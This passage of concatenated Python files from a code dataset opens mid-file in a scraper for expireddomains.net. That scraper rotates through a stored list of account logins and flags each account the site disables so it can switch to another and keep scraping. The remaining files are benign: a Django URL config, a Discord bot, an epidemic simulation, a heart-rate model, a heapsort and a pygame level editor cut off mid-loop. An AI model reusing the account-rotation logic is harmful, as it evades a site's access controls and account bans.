SLEEP_TIME = 5\n    MAX_PAGES = 600\n    PARAMS = {\n        'start': 0,\n        'ftlds[]': 2,\n        'flimit': 200,\n        'fonlycharhost': 1,\n        'fwordcountmin': 2,\n        'fwordcountmax': 2,\n        'fworden': 1,\n        'fstatuscomfree': 22,\n    }\n    REFRESH_TIME = 4 * 60\n    OUTPUT_FILE = os.path.join(settings.DOWNLOADS, NAME + '.csv')\n    viewfields = ['abirth', 'aentries', 'statuscom', 'statusnet', 'statusorg',\n                  'statusbiz', 'statusinfo', 'statusde', 'searchesglobal',\n                  'competition', 'acpc', 'statusus', 'statusca', 'statusuk',\n                  'statusco_uk', 'statuseu', 'statuscom_au', 'statusin',\n                  'statusco_in', 'statusat', 'statusch', 'statusbe', 'statusnl',\n                  'statusdk', 'statusfr', 'statuspl', 'statuses', 'statuspt',\n                  'statusit', 'statusme', 'statustv', 'statusio', 'statuscn',\n                  'statusru']\n    keys = ['Domain', 'ABY', 'ACR', 'C', 'N', 'O', 'B', 'I', 'D', 'SG',\n            'CPC', 'Add Date', 'US', 'CA', 'UK', 'CO.UK', 'CO', 'EU', 'COM.AU',\n            'IN', 'CO.IN', 'AT', 'CH', 'BE', 'NL', 'DK', 'FR', 'PL', 'ES',\n            'PT', 'IT', 'ME', 'TV', 'IO', 'CN', 'RU']\n\n    def __init__(self, login=True):\n        headers = {\n            'User-Agent': settings.USER_AGENT,\n        }\n        # proxies = settings.TOR_PROXIES\n        super().__init__(headers=headers)\n        fname = self.NAME + '.cookies'\n        self.cookies_file = os.path.join(settings.KEYS, fname)\n        fname = self.NAME + '.lst'\n        self.keys_file = os.path.join(settings.KEYS, fname)\n        self.DATA = settings.EXPIREDDOMAINS\n        self.start_time = int(time.time())\n        
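# next_refresh_time schedules a forced re-login REFRESH_TIME seconds from now (checked in get())\n        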
self.next_refresh_time = self.start_time + self.REFRESH_TIME\n if login:\n self.login(force=True) # Need to login first\n\n def get_all(self):\n years = range(2006, 2018)\n months = range(1, 13)\n\n total_added_count = 0\n c = 0\n for year in years:\n for month in months:\n if year == 2006 and month == 1:\n continue\n date = '%d%.2d' % (year, month)\n self.info('About to add for date: %s' % (date))\n total_added_count += self.get(c, date)\n c += 1\n\n self.info('Total %d domains added' % (total_added_count))\n\n return total_added_count\n\n def get(self, c, date):\n start = 0\n url = self.GET_URL.format(date=date)\n session = self.session\n\n added_count = 0\n\n res = {}\n order = {}\n for key in self.keys:\n res[key] = []\n order[key] = 1\n\n res_ = res\n\n for i_ in range(self.MAX_PAGES):\n params = self.PARAMS\n params['start'] = start\n for i in range(self.TRIES_COUNT):\n self.info('About to request...')\n try:\n r = session.get(url, params=params)\n self.info('Got response...')\n except Exception as e:\n self.warn('Error:')\n self.warn(e)\n continue\n if not r:\n self.warn('Error! Not r')\n self.login()\n continue\n if 'Sign Up' in r.text:\n self.warn('Need to relogin')\n self.login()\n else:\n soup = BeautifulSoup(r.content, 'lxml')\n table = soup.find('table', {'class': 'base1'})\n\n if table is None:\n break\n\n headers = table.find('thead').find_all('th')\n pos_ = 0\n for header in headers:\n k = header.get_text().strip()\n if k in self.keys:\n order[k] = pos_\n pos_ += 1\n\n rows = table.find('tbody').find_all('tr')\n if len(rows) < 1:\n break\n\n pos_ = 0\n for row in rows:\n data = row.find_all('td')\n for key, idx in order.items():\n try:\n k = data[idx].get_text().strip()\n if key in ['Domain']:\n k = data[idx].find('a')['title'].strip()\n res[key].append(k)\n except:\n res[key].append('')\n added_count += 1\n start += 200\n self.info('Start: %d: %d more added...' % (start,\n added_count))\n current_time = int(time.time())\n if current_time > self.next_refresh_time:\n self.info('Login refresh time...')\n self.next_refresh_time = current_time + self.REFRESH_TIME\n self.login(force=True)\n else:\n time.sleep(self.SLEEP_TIME)\n\n res_df = pd.DataFrame(res)\n res_df.to_csv(self.OUTPUT_FILE, mode='a', header=False, index=False)\n res = res_\n break\n\n self.info('Added %d domains for %s' % (added_count, date))\n return added_count\n\n def get_key(self, bad=False, random=True):\n self.info('Getting key... 
Random: %r' % (random))\n df_ = pd.read_csv(self.keys_file)\n if bad:\n df_.loc[df_['login'] == self.DATA['login'], 'blocked'] = 1\n df_.to_csv(self.keys_file, index=False)\n not_blocked = df_[df_['blocked'] == 0]\n if len(not_blocked) < 1:\n print('No active accounts left')\n return False\n df_1 = not_blocked.sample(n=1)\n self.DATA['login'] = df_1.iloc[0].login\n self.DATA['password'] = df_1.iloc[0].password\n\n def login(self, force=False, get_key=True):\n self.info('Login attempt')\n if get_key:\n self.get_key()\n if not force and self.is_logged():\n self.info('Already logged in')\n return True\n session = self.session\n data = self.DATA\n account_blocked = False\n for i in range(self.TRIES_COUNT):\n try:\n self.info('Trying to login as %s' % (data.get('login')))\n\n r = session.post(self.LOGIN_URL, data=data)\n\n if r.text.find('account was disabled') != -1 or r.text.find('need to activate') != -1:\n print('Account %s is blocked :(' % (data.get('login')))\n account_blocked = True\n\n if r.text.find('Logout') != -1:\n self.info('Successful login to %s' % (self.NAME))\n self.session = session\n # Make some calls\n with open(self.cookies_file, 'wb') as f:\n pickle.dump(utils.dict_from_cookiejar(session.cookies),\n f)\n return True\n self.warn('Cannot login to %s' % (self.NAME))\n except Exception as e:\n self.warn(e)\n self.warn('Cannot login to %s' % (self.NAME))\n if get_key or account_blocked:\n self.get_key(bad=account_blocked)\n account_blocked = False\n\n self.error('Even %d tries didnt help' % (self.TRIES_COUNT))\n return False\n\n def is_logged(self):\n session = self.session\n with open(self.cookies_file, 'rb') as f:\n cookie_dict = pickle.load(f)\n cookies = utils.cookiejar_from_dict(cookie_dict)\n session.cookies = cookies\n r = session.get(self.LOGIN_URL)\n if r.text.find('Logout') != -1:\n self.info('Successful login to %s' % (self.NAME))\n self.session = session\n return True\n return False\n\n def set_columns(self):\n df_ = pd.read_csv(self.keys_file)\n self.keys = df_[df_['check'] == 0]\n params = {\n 'viewfields[]': self.viewfields,\n 'save': ''\n }\n data = parse.urlencode(params)\n headers = {\n 'User-Agent': settings.USER_AGENT,\n 'Host': 'member.expireddomains.net',\n 'Origin': 'https://member.expireddomains.net',\n 'Referer': ':https//member.expireddomains.net/account/columnmanager/',\n }\n for idx, row in self.keys.iterrows():\n self.info('Setting columns for %s:%s' % (row.login,\n row.password))\n self.DATA['login'] = row.login\n self.DATA['password'] = row.password\n self.login(force=True, get_key=False)\n session = self.session\n session.headers = headers\n session.get(self.COLUMN_URL)\n r = session.post(self.COLUMN_URL, data=data)\n if r and r.status_code == 200:\n self.info('Successfuly set columns')\n df_.check[idx] = 1\n df_.to_csv(self.keys_file, index=False)\n","sub_path":"scraper/domain/expireddomains.py","file_name":"expireddomains.py","file_ext":"py","file_size_in_byte":9819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"304284776","text":"\"\"\"boneweb URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.conf.urls import url, include\n    2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n    url(r'^$', views.home, name='home'),\n    url(r'^about/$', views.about, name='about'),\n    url(r'^residents/$', views.residents, name='residents'),\n    url(r'^residents/([0-9]{4})/$', views.residents_by_year, name='residents_by_year'),\n    url(r'^residents/alumni/$', views.alumni, name='alumni'),\n    url(r'^quotes/$', views.quotes, name='quotes')\n    #url(r'^residents/([0-9]{4})/([A-Za-z0-9]+)/$', views.resident, name='resident'),\n    #url(r'^residents/([0-9]{4})/([A-Za-z0-9]+)/image$', views.resident_image, name='resident_image'),\n]\n","sub_path":"bone/boneweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643998745","text":"# -*- coding:utf-8 -*-\n\nimport os\n\ncur_dir = os.path.dirname(os.path.abspath(__file__))\n\nimg_dir = os.path.join(cur_dir, 'images')\n\nstyle_dir = os.path.join(cur_dir, 'images', 'styles')\n\n\ndef get_styles():\n    styles = []\n    for file_name in os.listdir(style_dir):\n        if os.path.isfile(os.path.join(style_dir, file_name)):\n            styles.append(os.path.join(style_dir, file_name))\n    return styles\n\n\nclass Config(object):\n    iterations = 1000  # number of iterations; 500~1000 gives good results\n    network = os.path.join(cur_dir, 'imagenet-vgg-verydeep-19.mat')\n    content = os.path.join(img_dir, 'girl.jpg')  # the content file to be rendered in the chosen style\n    styles = [os.path.join(style_dir, '1-style.jpg')] or get_styles()  # list of style files\n    filepath, tempfilename = os.path.split(content)\n    shotname, extension = os.path.splitext(tempfilename)\n    output = os.path.join(img_dir, '{}_output{}'.format(shotname, extension))  # output file name\n\n    # network=os.path.join()\n\n    @classmethod\n    def as_dict(cls):\n        _d = {k: v for k, v in cls.__dict__.items() if not k.startswith('_')}\n        return _d\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574108618","text":"import os\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands import CommandNotFound\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\nTOKEN = os.environ['DiscordBotToken']\nPREFIX = os.environ['DiscordBotPrefix']\n\nclient = commands.Bot(command_prefix=PREFIX, case_insensitive=True)\n\n\n@client.event\nasync def on_ready():\n    await client.change_presence(status=discord.Status.online, activity=discord.Game('Walter'))\n    print('Bot Has Successfully Started')\n\n\n# LOAD, UNLOAD AND RELOAD INDIVIDUAL COGS\n# @client.command()\n# async def load(ctx, extension):\n#     client.load_extension(f'Cogs.{extension}')\n\n\n# @client.command()\n# async def unload(ctx, extension):\n#     client.unload_extension(f'Cogs.{extension}')\n\n# @client.command()\n# async def reload(ctx, extension):\n    # client.unload_extension(f'Cogs.{extension}')\n    # client.load_extension(f'Cogs.{extension}')\n\n\n# Command Not Found Error\n@client.event\nasync def on_command_error(ctx, error):\n    if isinstance(error, CommandNotFound):\n        return\n    raise error\n\n\n# Loads all Cog files on start\nfor filename in os.listdir('./Cogs'):\n    if filename.endswith('.py'):\n        
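# filename[:-3] drops the \".py\" suffix so each cog loads as the module Cogs.<name>\n        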
client.load_extension(f'Cogs.{filename[:-3]}')\n\n\nclient.run(TOKEN)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"337309103","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 23 17:02:17 2020\r\n\r\n@author: bwhit\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\n#import seaborn as sns\r\nimport random\r\nimport numpy as np\r\n\r\nclass World:\r\n def __init__(self, population, sizex, sizey):\r\n self.contact_distance = 5\r\n self.transmission_rate = 0.1\r\n self.recovery_period = 1\r\n self.incubation_period = 1\r\n self.reset_period = 1\r\n \r\n self.sizex = sizex\r\n self.sizey = sizey\r\n self.health = (\"susceptible\", \"exposed\", \"infectious\", \"recovered\")\r\n self.population = population\r\n self.people = list()\r\n self.init_population()\r\n self.init_distance()\r\n \r\n def init_population(self):\r\n for person in range(self.population):\r\n x = random.uniform(0, self.sizex)\r\n y = random.uniform(0, self.sizey)\r\n status = self.health[0]\r\n \r\n self.people.append([person, x, y, status, 0])\r\n \r\n def init_distance(self):\r\n self.distance_matrix = np.zeros([self.population, self.population])\r\n iteration = 0\r\n for index1 in range(self.population):\r\n #print(\"Iteration\", iteration)\r\n person1 = self.people[index1]\r\n x1 = person1[1]\r\n y1 = person1[2]\r\n for index2 in range(self.population):\r\n person2 = self.people[index2]\r\n x2 = person2[1]\r\n y2 = person2[2]\r\n distance = np.sqrt((x1-x2)**2 + (y1-y2)**2)\r\n self.distance_matrix[index1, index2] = distance\r\n iteration = iteration+1\r\n \r\n def infect_random(self, number):\r\n for k in range(number):\r\n #infect one random person between [1, self.population]\r\n person = random.randint(0, self.population-1)\r\n self.people[person][3] = \"infectious\"\r\n self.initial_infection = number\r\n \r\n def update(self):\r\n self.people_update = self.people.copy()\r\n for index1 in range(self.population):\r\n num_days = self.people_update[index1][4]\r\n status = self.people_update[index1][3]\r\n if status == \"exposed\":\r\n num_days = num_days + 1\r\n if num_days >= self.incubation_period:\r\n #print(num_days)\r\n self.people_update[index1][3] = \"infectious\"\r\n self.people_update[index1][4] = 0\r\n else:\r\n self.people_update[index1][4] = num_days\r\n if status == \"infectious\":\r\n num_days = num_days + 1\r\n if num_days >= self.recovery_period:\r\n self.people_update[index1][3] = \"recovered\"\r\n self.people_update[index1][4] = 0\r\n else:\r\n self.people_update[index1][4] = num_days\r\n if status == \"recovered\":\r\n num_days = num_days + 1\r\n if num_days >= self.reset_period:\r\n self.people_update[index1][3] = \"susceptible\"\r\n self.people_update[index1][4] = 0\r\n \r\n if status == \"infectious\":\r\n for index2 in range(self.population):\r\n if index1 != index2:\r\n distance = self.distance_matrix[index1, index2]\r\n status2 = self.people_update[index2][3]\r\n if status2 == \"susceptible\":\r\n if distance <= self.contact_distance:\r\n number = random.uniform(0, 1)\r\n if number <= self.transmission_rate:\r\n self.people_update[index2][3] = \"exposed\"\r\n self.people = self.people_update\r\n\r\n#VARIABLES\r\nnum_people = 5000\r\nsizex = 50\r\nsizey = 50\r\n\r\nworld = World(num_people, sizex, sizey)\r\n\r\nx = list()\r\ny = 
list()\r\n\r\nstats = list()\r\n\r\ninitial_infection = 2\r\nworld.infect_random(initial_infection)\r\n\r\nfor k in range(20):\r\n num_susceptible = 0\r\n num_exposed = 0\r\n num_infectious = 0\r\n num_recovered = 0\r\n for person in world.people:\r\n x.append(person[1])\r\n y.append(person[2])\r\n status = person[3]\r\n \r\n if status == \"susceptible\":\r\n color = \"yellow\"\r\n num_susceptible = num_susceptible + 1\r\n elif status == \"exposed\":\r\n color = \"orange\"\r\n num_exposed = num_exposed + 1\r\n elif status == \"infectious\":\r\n color = \"purple\"\r\n num_infectious = num_infectious + 1\r\n else: #recovered\r\n color = (0.08, 0.706, 0.455)\r\n num_recovered = num_recovered + 1\r\n \r\n plt.plot(x[-1], y[-1], 'o', color = color)\r\n \r\n plt.grid(color='lightblue', alpha=0.5)\r\n plt.xlim([0,world.sizex])\r\n plt.ylim([0,world.sizey])\r\n \r\n plt.title(k+1)\r\n \r\n plt.show()\r\n \r\n world.update()\r\n stats.append([k, num_susceptible, num_exposed, num_infectious, num_recovered])\r\n #print(\"Susceptible, Exposed, Infectious, Recovered\")\r\n #print(num_susceptible, num_exposed, num_infectious, num_recovered)\r\n\r\nstatsarray = np.array(stats)\r\nplt.plot(statsarray[:,0], statsarray[:,1], label=\"Susceptible\", color=\"gold\")\r\nplt.plot(statsarray[:,0], statsarray[:,2], label=\"Exposed\", color=\"red\")\r\nplt.plot(statsarray[:,0], statsarray[:,3], label=\"Infectious\", color=\"purple\")\r\nplt.plot(statsarray[:,0], statsarray[:,4], label=\"Recovered\", color=\"green\")\r\nplt.legend()\r\nplt.grid(color = \"lightblue\", alpha = 0.5)\r\nplt.xlabel(\"Days\")\r\nplt.ylabel(\"Number of People\")\r\nplt.title(\"SIS Model\")\r\nplt.xlim([0,None])\r\nplt.ylim([0,None])\r\nplt.show()","sub_path":"SISModel.py","file_name":"SISModel.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"117059195","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten,ReLU,BatchNormalization,Activation\nfrom tensorflow.keras.layers import SimpleRNN, Embedding, LSTM,Reshape\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.utils import plot_model\nimport tensorflow as tf\nimport os\nimport glob\nimport pandas as pd\nimport dlib\nimport cv2 as cv\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n#모델\n\n\n\nmaximum = 0\nminimum = 200\nHR1 = []\nfor index in range(1,700):\n path_txt = glob.glob('./folder'+str(index)+'/*.csv')\n for i in path_txt:\n df = pd.read_csv(i, encoding='utf-8')\n maximum = max(max(df.loc[:,\"PULSE\"]),maximum)\n if maximum == 167 : print(index)\n minimum = min(min(df.loc[:,\"PULSE\"]),minimum)\n temp = df.loc[:, \"PULSE\"]\n HR1.append(temp)\nHR1 = np.array(HR1)\nHR_mean = HR1.mean()\nprint(maximum,minimum,HR_mean)\n\n#def My_Customized_Loss(y_true, y_pred):\n # return tf.math.reduce_mean(tf.abs(y_pred - HR_mean),axis=-1)\n\n'''\ninput = Input(batch_input_shape=(1, 25, 30, 3))\nCNN = Conv2D(filters=32, kernel_size=(3, 3), padding='same')(input)\nCNN = BatchNormalization()(CNN)\nCNN = Activation('relu')(CNN)\nCNN = Conv2D(filters=32, kernel_size=(3, 3), padding='same')(CNN)\nCNN = BatchNormalization()(CNN)\nCNN = Activation('relu')(CNN)\nCNN = MaxPooling2D(strides=2)(CNN)\nCNN = Conv2D(filters=64, kernel_size=(3, 3), padding='same')(CNN)\nCNN = BatchNormalization()(CNN)\nCNN = 
Activation('relu')(CNN)\nCNN = MaxPooling2D(strides=2)(CNN)\nCNN = Conv2D(filters=128, kernel_size=(3, 3), padding='same')(CNN)\nCNN = BatchNormalization()(CNN)\nCNN = Activation('relu')(CNN)\nCNN = MaxPooling2D(strides=2)(CNN)\nCNN = Reshape((1, 1152))(CNN)\n# RNN = Embedding(input_dim=256,output_dim=64)(CNN)\nRNN = LSTM(64, return_sequences=True, stateful=True)(CNN)\n# RNN=Activation('relu')(RNN)\nRNN = Dense(1)(RNN)\nmodel = Model(inputs=input, outputs=RNN)\nmodel = Model(inputs=input, outputs=RNN)\nmodel.compile(optimizer='sgd', loss=tf.keras.losses.MAE, metrics=[tf.keras.metrics.RootMeanSquaredError()])\nmodel.compile(optimizer='sgd', loss='mse', metrics=[tf.keras.metrics.RootMeanSquaredError()])\n# model.compile(optimizer='sgd',loss='mse',metrics=['mae'])\nprint(model.layers[17])\n\n\nfor index in range(1,700):\n #if index == 66:\n # continue\n HR=[]\n path_txt = glob.glob('./folder'+str(index)+'/*.csv')\n if not path_txt :\n print(\"No folder\"+str(index))\n continue\n print(path_txt)\n path_picture = glob.glob('./folder'+str(index)+'/*.PNG')\n for i in path_txt:\n df = pd.read_csv(i, encoding='utf-8')\n #maximum = max(df.loc[:,\"PULSE\"])\n #minimum = min(df.loc[:,\"PULSE\"])\n #print(df.loc[:,\"PULSE\"])\n #print(maximum, minimum)\n df.loc[:, \"PULSE\"] = (df.loc[:, \"PULSE\"] - minimum) / (maximum - minimum) # Min = 40, Max = 150 설정\n df.loc[:, \"SPO2\"] = df.loc[:, \"SPO2\"] / 100 # 0 ~ 1.00 으로 Normalization\n temp = df.loc[:,\"PULSE\"]\n SpO2 = df.loc[:,\"SPO2\"]\n HR.append(temp)\n HR=np.array(HR)\n\n\n #print(HR[0:40])\n #print(HR[0:40])\n\n x_data=[]\n for i in path_picture:\n #print(i)\n image = cv.imread(i)\n #print(image)\n x_data.append(image)\n if len(x_data) !=40 :\n print(\"No x_data size is 40\")\n continue;\n x_data = np.array(x_data)\n #print(np.array(x_data).shape)\n #x_train = x_data[0:30]\n #y_train = HR[:,0:30]\n #x_val = x_data[30:40]\n #y_val = HR[:,30:40]\n #y_train=y_train.reshape(-1,1)\n #y_val=y_val.reshape(-1,1)\n HR = HR.reshape(-1,1)\n print(x_data.shape)\n print(HR)\n #print(y_train)\n #print(y_val)\n #print(x_train.shape)\n #print(y_train.shape)\n #print(x_train)\n #print(y_train)\n #print(np.array(x_train).shape)\n #print(y_train.shape)\n #print(HR[30:40])\n #print(np.array(x_train[0]))\n #print(x_data)\n for epoch in range(50):\n print(index, epoch)\n model.fit(x_data,HR,batch_size=1,shuffle=False)\n #print(\"---------------------------------------------------------------\")\n #print(model.layers[17].states)\n #print(\"**************************************************************\")\n model.layers[17].reset_states()\n #print(model.layers[17].states)\n\n #print(x_data.shape,HR.shape)\n #print(x_train.shape, y_train.shape)\n #print(x_val.shape, y_val.shape)\n#for epoch in range(epochs):\n #for idx in range(11):\n\nmodel.summary()\n #from tensorflow.keras.utils import plot_model\n\nprint(type(model.layers[17]))\n\n#from keras.models import load_model\n\nmodel.save('epoch_50_Model_Total_700_min_max_normalization_max_is_140.h5')\ndel model\n'''\n#from keras.models import load_model\ntest=490\nmodel = tf.keras.models.load_model('epoch_50_Model_Total_700_min_max_normalization_max_is_140.h5')\nprint(\"--------------test----------------\")\npath_txt = glob.glob('./folder'+str(test)+'/*.csv')\nprint(path_txt)\nHR=[]\nfor i in path_txt:\n df = pd.read_csv(i, encoding='utf-8')\n #df.loc[:, \"PULSE\"] = (df.loc[:, \"PULSE\"] - 40) / (150 - 40) # Min = 40, Max = 150 설정\n df.loc[:, \"SPO2\"] = df.loc[:, \"SPO2\"] / 100 # 0 ~ 1.00 으로 Normalization\n temp = 
df.loc[:, \"PULSE\"]\n SpO2 = df.loc[:, \"SPO2\"]\n HR.append(temp)\nHR = np.array(HR)\nHR = HR.reshape(-1,1)\n\npath_picture = glob.glob('./folder'+str(test)+'/*.PNG')\nprint(path_picture)\nx_data=[]\nfor i in path_picture:\n #print(i)\n image = cv.imread(i)\n #print(image)\n x_data.append(image)\nif len(x_data) !=40 :\n print(\"No x_data size is 40\")\nx_data = np.array(x_data)\nimport math\ny_prediction = model.predict(x_data).flatten()\ny_prediction = y_prediction*(maximum-minimum) + minimum\nprint(\"예측\")\nprint(y_prediction)\nprint(\"측정\")\nprint(HR.flatten())\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#plt.plot(index.value)\nplt.xlim(0,40)\nplt.ylim(40,150)\n\nplt.plot(y_prediction,lw=1.5,label=\"Prediction\")\nplt.plot(HR,lw=1.5,label=\"Heart Rate\")\nplt.legend()\nplt.xlabel('Second')\nplt.ylabel('Heart Rate')\nplt.grid(True)\nplt.title('HR Estimation')\n\nplt.show()","sub_path":"model_hr.py","file_name":"model_hr.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"591400952","text":"\"\"\"\nAuthor: Wenhua Yang\nDate: 09/27/2016\n\"\"\"\n\nimport os\nfrom scrapy.http import TextResponse, Request\n\n\ndef fake_response(file_name, url):\n request = Request(url=url)\n responses_dir = os.path.dirname(os.path.realpath(__file__))\n file_path = os.path.join(responses_dir, file_name)\n file_content = open(file_path, 'r').read()\n response = TextResponse(url=url, request=request, body=file_content,\n encoding='utf-8')\n return response\n","sub_path":"index-crawler/crawler/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486369864","text":"def exch(pq, index1, index2):\n temp = pq[index1]\n pq[index1] = pq[index2]\n pq[index2] = temp\n\n\ndef sink(pq, index1, tail):\n while 2 * index1 <= tail:\n index2 = 2 * index1\n if index2 < tail and pq[index2] < pq[index2 + 1]:\n index2 += 1\n if pq[index2] < pq[index1]:\n break\n exch(pq, index1, index2)\n index1 = index2\n\n\n# use swim to implement heap sort may waste memory space\n# because we need to create a new list (array) to construct the heap\n# def swim(pq, key, tail):\n\n\ndef heapsort(nums):\n n = len(nums)\n nums.insert(0, 0)\n pq = nums\n for i in [n / 2 - j for j in range(n / 2)]:\n sink(pq, i, n)\n while n > 1:\n exch(pq, 1, n)\n n -= 1\n sink(pq, 1, n)\n","sub_path":"heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"88489108","text":"from functools import reduce\nimport bisect\n\ndef multi():\n return [lambda x : i*x for i in range(4)]\ndef multipliers():\n for i in range(4):\n yield lambda x: i *x\ndef out_(param):\n data=[]\n for i in multipliers():\n data.append(i)\n print(i(param))\n for j in data:\n print(j(param))\nif __name__ == '__main__':\n print(multi())\n print([m(3) for m in multi()])\n from collections import Counter\n res=map(lambda x:x*x,[y for y in range(3)])\n print(type(res))\n for i in res:\n print(type(i),i)\n print(list(res))\n ###############\n # out_(3)\n reduce(lambda x, y: x * y, range(1, 2))","sub_path":"others/bi_bao.py","file_name":"bi_bao.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} 
+{"seq_id":"300425136","text":"import pygame\nimport pygame.freetype\nimport time\nimport sys\nimport random\n\npygame.init()\n\n ############################################################\n\nclass tile:\n def __init__(self, x, y, tileSize, color = (0, 255, 0)):\n self.x = x\n self.y = y\n self.tileSize = tileSize\n self.surface = pygame.Surface((tileSize, tileSize))\n pygame.draw.rect(self.surface, (0, 255, 0), (0, 0, tileSize, tileSize))\n self.surface = self.surface.convert()\n\n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n\nclass Button:\n def __init__(self, x, y, tileSize, color, tileType):\n self.x = x\n self.y = y\n self.x1 = x\n self.y1 = y\n self.x2 = x + tileSize\n self.y2 = y + tileSize\n self.tileSize = tileSize\n self.tileType = tileType\n self.surface = pygame.Surface((tileSize, tileSize))\n self.color = color\n pygame.draw.rect(self.surface, color, (0, 0, tileSize, tileSize))\n self.surface = self.surface.convert()\n\n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n\nclass winTile:\n def __init__(self, x, y, tileSize):\n self.x = x\n self.y = y\n self.tileSize = tileSize\n self.surface = pygame.Surface((tileSize, tileSize))\n pygame.draw.rect(self.surface, (150, 150, 255), (0, 0, tileSize, tileSize))\n self.surface = self.surface.convert()\n\n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n\nclass startTile:\n def __init__(self, x, y, tileSize):\n self.x = x\n self.y = y\n self.tileSize = tileSize\n self.surface = pygame.Surface((tileSize, tileSize))\n pygame.draw.rect(self.surface, (255, 200, 200), (0, 0, tileSize, tileSize))\n self.surface = self.surface.convert()\n\n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n\n ############################################################\n\ndef collision(obj, mousePos):\n if not((obj.x1 >= (mousePos[0])) and not(obj.x2 <= mousePos[0])) and not((obj.y1 >= mousePos[1]) and not(obj.y2 <= mousePos[1])):\n return True\n else:\n return False\n\n ############################################################\nmainloop = True\n\nscreenX = 640\nscreenY = 480\n\ntileSize = 40\ntotalRow = int(screenY / tileSize)\ntotalCol = int(screenX / tileSize)\nprint(totalRow)\nprint(totalCol)\n\n\npaintTiles = []\nspecialTiles = []\n\nfont = pygame.freetype.SysFont('Comic Sans MS', 30)\n\nscreen = pygame.display.set_mode((screenX, screenY))\n\nbackground = pygame.Surface(screen.get_size())\nbackground.fill((230, 230, 255))\nbackground = background.convert()\nscreen.blit(background, (0, 0))\n\nwallButton = Button(620, 30, 20, (200, 255, 200), \"w\")\nvictoryButton = Button(620, 55, 20, (200, 200, 255), \"v\")\nstartButton = Button(620, 80, 20, (255, 200, 200), \"s\")\nbuttons = [wallButton, victoryButton, startButton]\n\nmousePos = pygame.mouse.get_pos()\n\nsnapTile = tile(mousePos[0] - (mousePos[0] % tileSize), mousePos[1] - (mousePos[1] % tileSize), tileSize, (170, 220, 170))\n\ntileType = \"w\"\nstartPlaced = False\nvictoryPlaced = False\n\nwhile mainloop:\n\n typeChanged = False\n\n mousePos = pygame.mouse.get_pos()\n\n snapTile.x = mousePos[0] - (mousePos[0] % tileSize)\n snapTile.y = mousePos[1] - (mousePos[1] % tileSize)\n\n screen.blit(background, (0, 0))\n\n for block in paintTiles:\n block.show()\n\n\n if startPlaced:\n start.show()\n if victoryPlaced:\n win.show()\n\n snapTile.show()\n\n wallButton.show()\n victoryButton.show()\n startButton.show()\n\n font.render_to(screen, (30, 30), str(mousePos[0]), (0, 0, 0))\n font.render_to(screen, (30, 60), str(mousePos[1]), (0, 0, 0))\n 
font.render_to(screen, (30, 100), \"When finished, press 'r'\", (0, 0, 0))\n\n    pygame.display.flip()\n\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            sys.exit()\n        elif event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_ESCAPE:\n                sys.exit()\n            if event.key == pygame.K_r:\n                mainloop = False\n        elif event.type == pygame.MOUSEBUTTONUP:\n            for button in buttons:\n                if collision(button, mousePos):\n                    tileType = button.tileType\n                    typeChanged = True\n            if not(typeChanged):\n                if tileType == \"w\":\n                    paintTiles.append(tile(mousePos[0] - (mousePos[0] % tileSize), mousePos[1] - (mousePos[1] % tileSize), tileSize))\n                elif tileType == \"v\":\n                    win = winTile(mousePos[0] - (mousePos[0] % tileSize), mousePos[1] - (mousePos[1] % tileSize), tileSize)\n                    victoryPlaced = True\n                elif tileType == \"s\":\n                    start = startTile(mousePos[0] - (mousePos[0] % tileSize), mousePos[1] - (mousePos[1] % tileSize), tileSize)\n                    startPlaced = True\n\nmapString = \"\"\ntileFound = False\n\n\nfor r in range(totalRow):\n    for c in range(totalCol):\n        tileFound = False\n        for block in paintTiles:\n            if 